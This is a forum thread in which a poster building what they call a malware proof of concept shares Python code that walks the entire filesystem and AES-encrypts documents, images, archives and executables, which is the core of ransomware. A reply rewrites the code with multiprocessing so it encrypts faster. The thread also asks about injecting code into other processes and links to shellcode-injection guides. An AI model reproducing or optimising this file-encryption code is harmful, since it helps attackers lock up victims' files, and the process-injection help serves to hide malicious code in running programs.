Multithreading in Python, and a question about code injection.
-
2016-04-19 at 3:35 PM UTC
So, as you guys know, I'm building a malware proof of concept. To enumerate the files and encrypt them I'm using os.walk plus a function that encrypts the files with the PyCrypto modules. Seeing as this is a very slow process, I was wondering if there were a way to speed things up a bit. Multithreading came to mind, and I was wondering if someone could explain how I can employ it with the following code.
import os
import random
import struct
from Crypto.Cipher import AES

def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
    """ Encrypts a file using AES (CBC mode) with the
        given key.

        key:
            The encryption key - a string that must be
            either 16, 24 or 32 bytes long. Longer keys
            are more secure.
        in_filename:
            Name of the input file
        out_filename:
            If None, '<in_filename>.crypt' will be used.
        chunksize:
            Sets the size of the chunk which the function
            uses to read and encrypt the file. Larger chunk
            sizes can be faster for some files and machines.
            chunksize must be divisible by 16.
    """
    if not out_filename:
        out_filename = in_filename + '.crypt'

    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += ' ' * (16 - len(chunk) % 16)

                outfile.write(encryptor.encrypt(chunk))
def selectfiles():
    for root, dirs, files in os.walk("/"):
        for file in files:
            # endswith takes a tuple of suffixes as one argument
            if file.endswith((".docx", ".pdf", ".rar", ".jpg", ".jpeg", ".png",
                              ".tiff", ".zip", ".7z", ".exe", ".mp3")):
                try:
                    #print(os.path.join(root, file))
                    in_filename = os.path.join(root, file)
                    encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024)
                except Exception as e:
                    #print e
                    pass
Above we have our function to encrypt the stuff, and below we have the part that I actually want to speed up. How would I go about this? Also, can I just add file extensions to the "endswith" method like so: (".docx",".pdf",".rar",".jpg",".jpeg",".png",".tiff",".zip",".7z",".exe",".mp3")?
Also, I know how DLL injection works and how to inject shellcode, but how would I go about injecting the code from a Python script or executable into a process? -
2016-04-19 at 5:33 PM UTC
Use a dynamic link library to do it.
https://warroom.securestate.com/injecting-python-code-into-native-processes/
see also: https://www.christophertruncer.com/injecting-shellcode-into-a-remote-process-with-python/ -
2016-04-19 at 5:41 PM UTC
Use a dynamic link library to do it.
https://warroom.securestate.com/injecting-python-code-into-native-processes/
see also: https://www.christophertruncer.com/injecting-shellcode-into-a-remote-process-with-python/
Yeah yeah, I am aware. As I said: I know how DLL injection works and how to inject shellcode, but how would I go about injecting the code from a Python script or executable into a process?
Obviously my script isn't a DLL and neither is it shellcode. I want to inject code from my Python script into a process. I can inject code from a DLL into a process with Python, no problem. But I need my Python code to be executed in a different process, not code from a DLL. -
2016-04-19 at 7:24 PM UTC
I'm not a Python programmer, but isn't Python run inside of a sandbox environment like Java? If so, I think it's going to run a bit slow either way. You may want to convert everything to C/C++ if it's not too late. If it's not run in a sandbox environment, disregard.
-
2016-04-19 at 8:57 PM UTC
I'm not a Python programmer, but isn't Python run inside of a sandbox environment like Java? If so, I think it's going to run a bit slow either way. You may want to convert everything to C/C++ if it's not too late. If it's not run in a sandbox environment, disregard.
The scripts are run with the help of an interpreter, but you can compile to a binary with PyInstaller, so I don't see how that makes Python 'run in a sandbox environment'. -
2016-04-19 at 9:09 PM UTC
Well, I obviously don't know shit about Python. I had thought it was always run within its own environment, like how Java is run in the JRE.
-
2016-04-19 at 11:20 PM UTC
Well, I obviously don't know shit about Python. I had thought it was always run within its own environment, like how Java is run in the JRE.
Sorry, I didn't mean to be condescending or anything. -
2016-04-20 at 3:08 AM UTC
Obviously my script isn't a DLL and neither is it shellcode. I want to inject code from my Python script into a process. I can inject code from a DLL into a process with Python, no problem. But I need my Python code to be executed in a different process, not code from a DLL.
Stop trying to make things difficult.
-
2016-04-20 at 4:16 AM UTC
Per the usual: shut up, spectroll.
I'm not a Python programmer, but isn't Python run inside of a sandbox environment like Java? If so, I think it's going to run a bit slow either way. You may want to convert everything to C/C++ if it's not too late. If it's not run in a sandbox environment, disregard.
Python is generally considered interpreted, although interestingly it does run on a virtual machine of sorts, albeit one very different from the JVM. It's true that Python is, in reasonable benchmarks, slower than lower-level languages, but PyCrypto is implemented in C. Much of Python's standard library, and most performance-intensive third-party libraries, are implemented in C and exposed to Python through a thin in-process interop layer.
The scripts are run with the help of an interpreter, but you can compile to a binary with PyInstaller, so I don't see how that makes Python 'run in a sandbox environment'.
PyInstaller isn't really compilation in the classical sense. Most of what PyInstaller does is bundle a portable Python interpreter with your program's source code, so you shouldn't see any performance improvement from building with PyInstaller versus running under the interpreter directly. I'm not sure it's fair to call either the Python VM or the JVM a "sandbox environment", since both can make system calls and interact with the OS in the same ways a compiled binary can (the JVM does have some provision for true sandboxing, as in a browser environment, but no one really uses it anymore because it was a shitshow of exploits and generally a poorly considered system). It is true, though, that you're largely abstracted away from many architecture and OS details in such environments.
AAAAnnnnyyyyway, this is exactly the kind of place where parallelism makes sense. There is an unfortunate detail of CPython (the Python implementation I'm sure you're using; interestingly there are other implementations of the language, but you don't need to worry about that) called the global interpreter lock, or GIL, that makes threading in Python a somewhat different proposition than in other languages. You can read about the details, it's pretty interesting, but the gist is that CPU-bound tasks (like crypto, in contrast to IO-bound tasks like requesting resources over the network or reading from disk; encrypting files will hit your disk, but it will likely bottleneck at the CPU) are not good candidates for multithreading.
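To make the GIL's effect concrete, here's a toy sketch (the count_primes function is made up, standing in for any CPU-bound work): two threads both finish with correct answers, but since only one of them can execute Python bytecode at any instant, the wall-clock time is roughly the same as running the computations back to back.

```python
import threading

def count_primes(limit):
    """Naive CPU-bound work: count the primes below `limit`."""
    count = 0
    for n in range(2, limit):
        if all(n % d for d in range(2, int(n ** 0.5) + 1)):
            count += 1
    return count

results = {}

def worker(name, limit):
    results[name] = count_primes(limit)

threads = [threading.Thread(target=worker, args=(i, 10000)) for i in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# Correct results, but because of the GIL the two threads took turns on
# the CPU instead of running in parallel.
print(results)  # {0: 1229, 1: 1229} -- there are 1229 primes below 10000
```

If the work were IO-bound (network requests, sleeping on sockets), the GIL would be released during the waits and threads would actually help.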
Fortunately you can use another standard library module, multiprocessing. Semantically, from your perspective, it's the same thing as threads; the difference is largely an implementation detail. The basic strategy: build up a list of the files you want to encrypt using os.walk (presumably fast enough that you can do it in the main process without things being too slow; if not, you can parallelize the filesystem walk too, but I don't think that's what'll be slow), stuff them into a queue, and then start up N processes consuming from the queue, where N is your number of cores or thereabouts.
So in the context of your program I'd rewrite your selectfiles function something like this (warning, untested code):
from multiprocessing import Pool

def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

def selectfiles():
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith((".docx", ".pdf", ".rar", ".jpg", ".jpeg", ".png",
                              ".tiff", ".zip", ".7z", ".exe", ".mp3")):
                files_to_enc.append(os.path.join(root, file))
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
By the nature of `Pool.map`, the function passed as the first arg will always be invoked with a single argument, which will be an item from the queue the pool is processing (a queue of filenames in this case), so single_arg_encrypt_file is just a means of ensuring the signature of the function passed to .map is what's expected. -
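If you'd rather not write that wrapper by hand, functools.partial can pin the extra argument instead. A minimal sketch, with a made-up scale function standing in for encrypt_file:

```python
from functools import partial
from multiprocessing import Pool

def scale(factor, x):
    # Stand-in for encrypt_file(key, in_filename): the first argument
    # is fixed up front, the second comes from the pool's queue.
    return factor * x

if __name__ == "__main__":
    pool = Pool(processes=2)
    # partial(scale, 10) is a one-argument callable, so it fits Pool.map.
    print(pool.map(partial(scale, 10), [1, 2, 3]))  # [10, 20, 30]
    pool.close()
    pool.join()
```

Note the partial object (and whatever it wraps) has to be picklable to cross the process boundary, same as any function you hand to Pool.map.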
2016-04-20 at 3:01 PM UTC
11/10
Thorough as always, will test your code shortly.